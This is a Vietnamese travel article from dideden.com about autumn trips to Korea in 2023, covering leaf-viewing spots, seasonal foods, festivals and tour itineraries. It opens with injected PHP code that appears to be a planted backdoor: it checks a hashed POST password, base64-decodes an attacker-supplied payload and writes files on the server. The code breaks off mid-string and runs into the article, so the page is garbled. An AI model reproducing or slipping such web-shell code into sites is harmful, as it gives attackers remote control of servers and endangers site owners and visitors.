function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Kinh nghiệm DU LỊCH HÀN QUỐC NĂM 2023 mùa thu A-Z

Kinh nghiệm DU LỊCH HÀN QUỐC NĂM 2023 mùa thu A-Z

08/11/2022 Đi Để Đến - Group

Hàn Quốc là đất nước không những nổi tiếng với những cảnh đẹp say đắm mà còn gây ấn tượng với du khách bởi vẻ đẹp tuyệt vời của cỏ cây hoa lá. Du lịch Hàn Quốc năm 2023 mùa thu cũng trở thành chủ đề quan tâm của du khách thập phương. Bởi đến Hàn Quốc mùa thu, du khách sẽ được hòa mình vào khung cảnh ngập sắc đỏ. 

Cùng dideden.com khám phá mùa thu Hàn Quốc để có cái nhìn rõ hơn về ẩm thực, cảnh sắc, và thời tiết tại đây. 

THỜI TIẾT MÙA THU HÀN QUỐC 

Mùa thu được coi là giai đoạn lý tưởng nhất trong năm. Thời tiết mùa thu Hàn Quốc không mưa, trời se lạnh rất hợp để có thể du ngoạn hết khắp các nẻo đường. 

du lich han quoc nam 2022 - thoi tiet

Du khách có thể lựa chọn bất kỳ thời điểm nào trong 3 tháng 9,10,11 để đi du lịch Hàn Quốc năm 2023. Nguồn: Sưu tầm

Vậy mùa thu Hàn Quốc bắt đầu vào tháng mấy? Mùa thu Hàn Quốc cũng gần giống với các quốc gia khác như Việt Nam khi bắt đầu vào tầm tháng 9,10,11. Du khách có thể lựa chọn bất kỳ thời điểm nào trong 3 tháng 9,10,11 để đi du lịch Hàn Quốc năm 2023

ĐIỂM DU LỊCH NGẮM LÁ MÙA THU ĐẸP

1. Du lịch Hàn Quốc năm 2023 – Seoul

Đi du lịch Hàn Quốc năm 2023 trong tháng 11 này, du khách chắc chắn sẽ phải ghé thăm con đường Jeongdong-ril ngắm lá đỏ rụng. Con đường dẫn tới các điểm tham quan nổi tiếng ở Seoul như Deoksugung, Bảo tàng nghệ thuận, tòa tháp N Seoul,…Cảnh sắc tại con đường sẽ khiến bạn không thể rời mắt vì đậm chất lãng mạn và rực rỡ. 

du lich han quoc nam 2022 - duong Jeongdong-ril

Đường Jeongdong-ril với những tán cây ngập tràn lá đỏ khiến du khách thích thú. Nguồn: Sưu tầm

Các cung điện ở Seoul đều mang cả mùa thu của Hàn Quốc bên trong. Bên trong các cung điện ở đây sẽ có khu vườn. Trong khu vườn sẽ trưng bày rất nhiều tán lá đẹp điển hình như khu vườn bí mật ở cung điện Changdeokgung. 

Ngay trong cung điện còn có cái ao nơi phản chiếu những chiếc lá đỏ mùa thu. Khung cảnh tại cung điện như một bức tranh rực rỡ sắc màu. Ai ai đến với cung điện đều cảm thán trước vẻ đẹp tuyệt vời này. 

>>> Xem thêm: Du lịch Hàn Quốc 2023 – Top 5+ kinh nghiệm không thể bỏ qua

2. Du lịch Hàn Quốc năm 2023 – Đảo Nami

Nami là điểm đến ngắm hoa lá đỏ đã từng xuất hiện trong bộ phim Bản tình ca mùa đông. Và cũng vì vậy, du lịch Hàn Quốc năm 2023 mùa này Nami luôn thu hút du khách từ khắp mọi nơi đến cắm trại, tản bộ. 

du lich han quoc nam 2022 - dao Nami

Check in tại đảo Nami với những tán lá vàng rợp trời. Nguồn: Sưu tầm

Vẻ đẹp tại hòn đảo xinh đẹp Nami không chỉ dừng lại ở những con đường ngập sắc đỏ vàng mà còn là những rừng thông, rừng bạch quả, rừng phong đỏ cuốn hút. Cầm máy lên và du khách có thể có được bức ảnh đẹp như mong muốn. 

3. Du lịch Hàn Quốc năm 2023 – Vườn quốc gia ở Gangwondo

Cách khám phá vẻ đẹp mùa lá đỏ trong chuyến du lịch Hàn Quốc năm 2023 ở Gangwondo sẽ có đôi chút khác biệt. Thay vì đi dạo dưới những tán cây lá đỏ rụng, du khách sẽ được ngắm nhìn toàn cảnh từ trên cao. 

Du khách có thể lựa chọn đi cáp treo hoặc thực hiện hành trình leo núi từ chùa lên trên đỉnh cao gần 1000m để ngắm lá đỏ. Cảnh tượng trước mắt tại Gangwondo sẽ không làm du khách thất vọng. 

>>> Xem thêm: KHÁM PHÁ TOUR HÀN QUỐC 2023 – NHỮNG ĐIỀU PHẢI BIẾT

4. Du lịch Hàn Quốc năm 2023 – Đường cây Asan Gingko 

Cây phong, cây bạch quả là hai loại cây đẹp nhất trong mùa thu Hàn Quốc. Vì thế đường cây Asan Gingko là sự lựa chọn tuyệt vời khi đi du lịch Hàn Quốc năm 2023 mùa này. 

du lich han quoc nam 2022 - duong Asan Gingko

Con đường với những tán lá sum sê rợp vàng che bóng mát cùng thảm lá trên nền đất do lá cây rơi rụng là điều thú vị tại Asan Gingko. Nguồn: Sưu tầm

Con đường với những tán lá sum sê che bóng mát cùng thảm lá trên nền đất do lá cây rơi rụng là điều thú vị tại Asan Gingko. Trong chuyến du lịch Hàn Quốc năm 2023, để ngắm được cảnh tượng như vậy là điều hết sức đáng giá. 

5. Du lịch Hàn Quốc năm 2023 – Thành phố Gyeongju

Gyeongju là thành phố của những kiến trúc lịch sử và những địa điểm ngắm lá tuyệt đẹp. Lá bạch quả và lá phong ngập tràn trên các con đường của Gyeongju là tín hiệu cho thấy thu đã sang tại thành phố này. 

6. Du lịch Hàn Quốc năm 2023 – Vườn quốc gia Jirisan

Vườn quốc gia Jirisan là công viên lớn nhất Hàn Quốc mang đến những trải nghiệm đẹp đẽ của mùa thu. Chuyến du lịch Hàn Quốc năm 2023 mùa thu không thể thiếu vườn quốc gia Jirisan. 

du lich han quoc nam 2022 - Vuon quoc gia Jirisan

Cây cầu gỗ bắc qua suối ở vườn quốc gia Jirisan. Nguồn: Sưu tầm

Du khách có thể leo núi lên trên phía đỉnh cao nhất, ngắm toàn cảnh Hàn Quốc. Một số du khách còn chọn dừng chân tại những nhà nghỉ phía chân núi để tiện tham quan mọi khoảnh khắc đẹp nhất trong ngày như bình minh hay hoàng hôn. 

>>> Xem thêm: Bỏ túi bí kíp khám phá tour đi Hàn Quốc 5 ngày 4 đêm

7. Du lịch Hàn Quốc năm 2023 – Vườn Quốc gia Odaesan

Vườn quốc gia Odaesan sẽ đem đến cho du khách trải nghiệm đặc biệt vào thu đó là chuyến đi xuyên rừng, ngắm những tán lá đỏ ngập trời. Bạn sẽ không cần đi lên đỉnh núi để có thể chiêm ngưỡng khung cảnh đẹp nhất mà chỉ cần đi trên những con đường rợp bóng. 

Vì thế, nhiều du khách thường chọn vườn quốc gia Odaesan trong chuyến du lịch Hàn Quốc năm 2023 mùa thu bởi không tốn quá nhiều sức lực mà vẫn có thể thấy được sự hùng vĩ rừng cây. 

8. Du lịch Hàn Quốc năm 2023 – Vườn quốc gia Naejangsan

Vườn quốc gia Naejangsan chứa nhiều bí mật của mùa thu. Do đó, là những du khách ưa khám phá thì không thể bỏ qua vườn quốc gia Naejangsan trong chuyến du lịch Hàn Quốc năm 2023 này. 

du lich han quoc nam 2022 - vuon quoc gia

Màu sắc của những tán lá phong tại vườn quốc gia Naejangsan mang sắc đỏ rực rỡ. Nguồn: Sưu tầm

Màu sắc của những tán lá phong và nhiều loại cây khác trải dài khắp vườn quốc gia. Từ khi bạn bước chân qua đường hầm Maple Tree cho đến đền Naejangsan, bạn đều có thể thấy khung cảnh tuyệt diệu này. 

NHỮNG MÓN ĂN NGON Ở HÀN QUỐC MÙA THU

1. Cua xanh

Cua xanh là đặc sản vùng biển Hàn Quốc và thường chỉ có vào mùa thu ở đây. Du khách có thể thưởng thức món súp cua hoặc cua sống ngâm trong chuyến du lịch Hàn Quốc. Đây đều là những cách chế biến được nhiều du khách yêu thích. 

Hương vị đậm đà từ cua vẫn được giữ nguyên dù chế biến bằng nhiều cách khác nhau. Hơn nữa cua càng xanh cung cấp nhiều chất dinh dưỡng nên thường được dùng như một món ăn bồi bổ, tăng cường sức đề kháng. 

>>> Xem thêm: Du lịch Hàn Quốc tháng nào đẹp nhất – Hoạt động du lịch 2023

2. Cá mòi chấm 

Thịt cá mòi mùa thu vô cùng thơm ngon, rất hợp thưởng thức vào mùa này. Vì lúc này, cá được tích trữ vô cùng nhiều dưỡng chất. Thông thường, cá mòi chấm sẽ được ăn sống nguyên nên bạn có thể nếm thử hương vị tự nhiên của hải sản. Ngoài ra, người ta cũng đem cá mòi đi nướng để ăn toàn bộ thịt cá. 

du lich han quoc nam 2022 - ca moi

Cá mòi chấm được nướng lên và mang một hương vị đặc biệt. Nguồn: Sưu tầm

3. Nấm thông 

Đi du lịch mùa thu, du khách chắc chắn nên thử món nấm thông. Nấm thông là món ăn giàu chất dinh dưỡng. Nấm thông có thể được nấu cùng với những món thịt như thịt bò, bào ngư. 

Ngoài ra, đến Hàn Quốc mùa thu thăm người thân bạn bè, bạn còn có thể được mời ăn món lẩu nấm nóng hổi thơm lừng. 

du lich han quoc nam 2022 - nam thong

Nấm thông là loại nấm có nhiều chất dinh dưỡng nên được người dân Hàn chế biến thành nhiều loại món ăn Nguồn: Sưu tầm

4. Quả hồng 

Quả hồng là loại hoa quả rất được lòng người dân xứ Hàn. Hồng được ăn kèm với mứt, bingsu hay nước ép. Hồng sấy dẻo cũng là một món quà thường được nhiều du khách đem về khi đi du lịch mùa thu. 

>>> Xem thêm: Thử thách 6 ngày 6 đêm du lịch Hàn Quốc đi nào?

5. Bánh Songpyeon

Bánh Songpyeon là loại bánh trung thu ở Hàn Quốc. Bánh được làm từ bột gạo nếp, mật ong, bí ngô. Món bánh theo ý nghĩa Hàn Quốc là thành công vì thế đi du lịch Hàn Quốc, chắc chắn du khách nên nếm thử món ăn này. Hương vị ngọt thanh từ chiếc bánh chính là điểm nhấn của món ăn này. 

6. Jook

Jook là tên một món cháo được nấu từ gạo, hạt bí, gà và nấm. Jook thường được người Hàn ăn nhiều vào mùa thu vì vô cùng hợp với tiết trời se lạnh. Ngoài ra cũng có một số món ăn khác như cháo bí ngô hay đậu đỏ cũng rất ngon. 

du lich han quoc nam 2022 - jook

Jook là món cháo nóng hổi được nấu với nhiều loại nguyên liệu thường được người Hàn ăn nhiều vào mùa thu. Nguồn: Sưu tầm

7. Jeungpyeon 

Jeungpyeon là món bánh cổ truyền được người Hàn ưa chuộng. Do đó, du khách quốc tế rất thích thú và muốn thử một lần trong chuyến đi Hàn. Mùa thu sẽ không thể trọn vẹn nếu thiếu đi bánh Jeungpyeon. 

Bánh được làm từ bột và rượu gạo, nhân bên trong từ táo tàu, hạt thông, nấm đá. Tất cả hòa quyện vào nhau tạo nên hương vị đặc sắc, khó có thể quên. 

LỄ HỘI HÀN QUỐC MÙA THU 

1. Múa mặt nạ quốc tế 

Biểu diễn múa mặt nạ quốc tế thường diễn ra tầm tháng 9 tháng 10 ở Hàn Quốc. Lễ hội tổ chức với mục đích tôn vinh nghề làm và múa mặt nạ. Chiếc mặt nạ với màu sắc sặc sỡ, tươi sáng chính là công cụ hỗ trợ cho các điệu múa truyền thống Hàn Quốc. Du khách cũng có thể mua mặt nạ về như một món quà tặng người thân khi du lịch Hàn Quốc.

du lich han quoc nam 2022 - mua mat na

Chiếc mặt nạ với màu sắc sặc sỡ, tươi sáng chính là công cụ hỗ trợ cho các điệu múa truyền thống Hàn Quốc. Nguồn: Sưu tầm

2. Jeongseon Arirang

Lễ hội được UNESCO công nhận là di sản văn hóa phi vật thể, do đó được người Hàn bảo tồn và phát triển không ngừng. Đến lễ hội, du khách sẽ được tham gia các trò chơi, làm đồ thủ công mỹ nghệ. 

>>> Xem thêm: Tour Hàn Quốc 4 ngày 3 đêm – Top 5 gợi ý trải nghiệm hữu ích

3. Chuseok

Chuseok là tết trung thu ở Hàn và được tổ chức rằm tháng 8. Tết trung thu có ý nghĩa vô cùng to lớn với Hàn Quốc, do đó, lễ hội này sẽ được tổ chức lớn nhất năm. Dịp trung thu ở Hàn chính là thời điểm các thành viên gia đình tụ tập ăn uống nghỉ ngơi, cũng giống như tết âm lịch ở Việt Nam.

du lich han quoc nam 2022 - chuseok

Cả gia đình đang sum vầy, thực hiện các lễ nghi vào dịp trung thu Hàn Quốc. Nguồn: Sưu tầm

4. Hanji

Đến với lễ hội Hanji, du khách sẽ được trải nghiệm các đặc tính của giấy Hanji. Hanji là một loại giấy được làm từ vỏ cây mọc ở sườn núi, chất nhầy.

du lich han quoc nam 2022 - hanji

Những chiếc đèn lồng với nhiều hình thù được trưng bày trong lễ hội. Nguồn: Sưu tầm

Giấy Hanji thường được dùng làm đèn lồng, quần áo. Họ tổ chức lễ hội như một hình thức quảng bá loại giấy đặc biệt này.

5. Lễ hội pháo hoa Busan

Lễ hội pháo hoa ở Busan thu hút nhiều khách du lịch vào tầm cuối tháng 10. Pháo hoa với nhiều màu sắc khác nhau, được tổ chức gần cầu Gwangan. Trong lễ hội pháo hoa, du khách sẽ được chiêm ngưỡng những màn trình vô cùng đặc sắc từ các ca sĩ nổi tiếng. 

du lich han quoc nam 2022 - le hoi phao hoa Busan

Pháo hoa với nhiều màu sắc khác nhau, được tổ chức gần cầu Gwangan. Nguồn: Sưu tầm

6. Lễ hội ẩm thực đường phố

Nhằm tôn vinh những đầu bếp tài giỏi và văn hóa ẩm thực của Jeonju. Du khách tham gia lễ hội sẽ được nếm thử những món ăn đẹp mắt, thơm ngon được nấu bởi các nghệ nhân. Đây là lễ hội nên tham gia khi đi du lịch Hàn Quốc. 

du lich han quoc nam 2022 - le hoi am thuc

Những vị đầu bếp tài ba của Hàn Quốc sẽ tụ hội trong lễ hội này để nấu những món ăn thơm ngon. Nguồn: Sưu tầm

Lễ hội ẩm thực sẽ giúp bạn hiểu rõ hơn về ẩm thực đường phố tại Hàn Quốc. Những món ăn như chả cá, tokbokki đều sẽ có mặt trong lễ hội ẩm thực. Vì thế, nếu du khách muốn thử các món ăn đậm chất Hàn này thì không nên bỏ lỡ. 

>>> Xem thêm: Tour Hàn Quốc từ Đà Nẵng trải nghiệm không thể quên

GỢI Ý MỘT SỐ TOUR DU LỊCH HÀN QUỐC MÙA THU

Hiện nay, khi đi du lịch nước ngoài, đi tour là lựa chọn an toàn bởi các cơ sở đặt tour sẽ thường liên kết với những khách sạn, hãng hàng không để có được giá tốt nhất. Hơn nữa, du khách sẽ được hướng dẫn viên giới thiệu về các địa điểm ở Hàn Quốc, giúp du khách hiểu rõ hơn về đất nước này.

1. Tour Hàn Quốc 5 ngày 4 đêm của Vietnam Booking

Vietnam Booking là địa chỉ đặt tour uy tín, sẽ đem lại cho du khách những trải nghiệm thú vị. Trong chuyến du lịch Hàn Quốc: 

  • Du khách sẽ được tham quan đảo Nami xinh đẹp, ngắm lá đỏ rợp những tán cây. 
  • Du khách sẽ được dạo chơi ở quảng trường đẹp nhất Seoul và suối Cheonggyecheon. 
  • Đặc biệt, là du khách sẽ được đến thăm các cung điện nổi tiếng, một trong những địa điểm nên đến vào mùa thu. 
  • Vui chơi tại công viên Everland – một trong những công viên lớn nhất thế giới
  • Mua sắm tại các cửa hàng mỹ phẩm, trung tâm thương mại tại thủ đô Seoul
  • Nếm thử những món ăn ngon đặc trưng ở Hàn Quốc. 

Ngày 1: Di chuyển đến thủ đô Seoul

Du khách sẽ có chuyến bay đêm và ăn nhẹ trên máy bay

Ngày 2: Seoul – đảo Nami

Hướng dẫn viên sẽ đón tiếp du khách tại Seoul và dẫn đoàn đi ăn sáng. Tiếp đó, du khách sẽ bắt đầu hành trình đi đảo Nami.

Nami mùa thu với thời tiết dễ chịu, cảnh sắc rực rỡ từ sắc vàng đỏ của những tán lá phong. Trưa: Du khách sẽ được ăn tại nhà hàng gà nướng BBQ ở đảo Nami.

Chiều: Du khách sẽ tham quan những địa danh nổi tiếng như quảng trường Gwanghwamun. Quảng trường này nằm ở Seoul với diện tích rộng và nhiều cây xanh. 

du lich han quoc nam 2022 - quang truong

Quảng trường được rất nhiều du khách ghé thăm  Nguồn: Sưu tầm

Sau đó, du khách sẽ được tham quan suối Cheonggyecheon. Suối nằm ở thủ đô Seoul vì thế du khách có thể dễ dàng tham quan mà không cần leo núi để có thể thấy suối.

Tối: Du khách sẽ ăn tại nhà hàng và vui chơi tự do

Ngày 3: Seoul – khu vui chơi Everland

Sáng: Du khách sẽ đến công viên Everland để vui chơi. Ở đây có các trò chơi mạo hiểm, khu vườn thú Safari và gấu trúc. Ngoài ra, du khách sẽ được mua sắm và dùng thử các sản phẩm tại cửa hàng mỹ phẩm nội địa.  

Trưa: Du khách sẽ ăn trưa tại nhà hàng và nghỉ ngơi. 

Chiều: Du khách sẽ tham quan trung tâm nhân sâm chính phủ và tháp N trên núi Namsan. Tháp N là một trong những địa điểm ngắm lá đỏ cực kỳ tuyệt vời vì thế đến tháp N du khách sẽ có được rất nhiều bức ảnh đẹp của mùa thu.

Địa điểm tham quan cuối cùng trong ngày là chợ Myeongdong, du khách sẽ mua sắm và tự do ăn uống. 

Tối: Du khách sẽ về khách sạn nghỉ ngơi và vui chơi tại Seoul

Ngày 4: Cung điện – Blue House

Sáng: Du khách sẽ tham quan các địa danh như Gyeongbokgung, viện bảo tàng Quốc gia Triều Tiên và Blue House. 

du lich han quoc nam 2022 - cung dien

Check-in trong bộ trang phục truyền thống ở một cung điện ở Hàn Quốc. Nguồn: Sưu tầm

Chiều: Du khách sẽ tham quan cửa hàng tinh dầu thông đỏ và mua sắm ở đây. 

Tối: Du khách sẽ dùng bữa ở nhà hàng và dạo chơi tự do

Ngày 5: Seoul trở về

Du khách sẽ mua sắm quà tại các cửa hàng bách hóa và di chuyển ra sân bay để trở về Việt Nam.

>>> Xem thêm: Trải nghiệm tour đi Hàn Quốc 2023 SIÊU CHẤT

2. Tour Hàn Quốc 4 ngày 4 đêm của Vietnam Booking

Ngày 1: Seoul – Nami – Khu trượt tuyết

Sau khi hạ cạnh xuống sân bay, du khách sẽ được đoàn dẫn đi Đảo Nami. Khung cảnh ở đảo Nami thơ mộng và tuyệt đẹp như bộ phim nổi tiếng ở Hàn Quốc. Sau đó, du khách sẽ tham quan khu trượt tuyết Elysian và trải nghiệm các trò chơi hết sức thú vị. 

Du khách sẽ nghỉ đêm ở khách sạn trong Seoul

Ngày 2: Seoul – Everland 

Trong chuyến du lịch Hàn Quốc năm 2023, du khách sẽ tham quan cung điện Gyeongbokgung và ghé thăm một số địa điểm nổi tiếng như trung tâm nhân sâm, quảng trường Gwanghwamun, suối Cheonggyecheon. Ngoài ra, du khách sẽ được chụp ảnh tại thư viện Coex khổng lồ. Sau khi đi tham quan, du khách sẽ mua sắm tự do tại chợ Dongdaemun.

Du khách sẽ được vui chơi giải trí tại công viên Everland, tham quan bảo tàng rong biển, trải nghiệm tại làm kim chi và mặc Hanbok. Du khách còn được mua sắm tại các cửa hàng dược thảo, nông sản. 

du lich han quoc nam 2022 - everland

Everland thu hút giới trẻ đến vui chơi giải trí và chụp ảnh tại những tượng hình thú sặc sỡ. Nguồn: Sưu tầm

Ngày 3: City tour Seoul – Drawing Show

Sáng: Du khách sẽ được đoàn dẫn tham quan thủ đô Seoul với các hoạt động như tham gia lớp học làm kim chi, và chụp ảnh với trang phục truyền thống. Ngoài ra, du khách sẽ được mua sắm ở cửa hàng sâm và cửa hàng mỹ phẩm nổi tiếng ở đất nước này. 

Chiều: Du khách tiếp tục đi tham quan một số các địa điểm khác như Blue House, cung điện hoàng gia, viện bảo tàng truyền thống hay tháp N Seoul Tower. Các địa danh này đều là những địa điểm tuyệt vời để du khách có thể ngắm cảnh sắc mùa thu Hàn Quốc trọn vẹn. 

Tối: Du khách sẽ được thưởng thức những màn trình diễn đặc sắc của chương trình nghệ thuật Drawing Show và ăn tối tại một nhà hàng ở Seoul.

Ngày 4: Trở về

Du khách sẽ ăn sáng tại Seoul và lên chuyến bay để trở về Việt Nam

>>> Xem thêm: NÊN ĐI DU LỊCH HÀN QUỐC MÙA NÀO ĐẸP NHẤT NĂM 2023

LƯU Ý CHO CHUYẾN DU LỊCH HÀN QUỐC 2023

Chuyến du lịch Hàn Quốc sẽ càng trọn vẹn nếu như du khách có sự chuẩn bị thật tốt. 

  • Du khách nên chuẩn bị tiền mặt để thuận tiện cho việc mua sắm.
  • Chuẩn bị đầy đủ các giấy tờ tùy thân
  • Tìm hiểu kỹ về văn hóa Hàn Quốc
  • Tải sẵn các ứng dụng cần thiết cho việc đi du lịch
  • Mua sim số 3G 4G để sử dụng ở Hàn Quốc

Hàn Quốc là địa điểm tuyệt vời để đi du lịch vào mùa thu. Trên đây là toàn bộ kinh nghiệm đi du lịch Hàn Quốc năm 2023 cùng gợi ý các tour du lịch hot nhất hiện nay. Hy vọng sau khi đọc bài viết của dideden.com, bạn đã có được những thông tin hữu ích cho chuyến du lịch của mình. Nếu bạn mong muốn tìm hiểu về đất nước Hàn Quốc và ngắm lá đỏ rợp trời thì liên hệ 1900 3398 để được hỗ trợ và tư vấn. 

ĐĂNG KÍ ĐẶT TOUR DU LỊCH HÀN QUỐC
  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]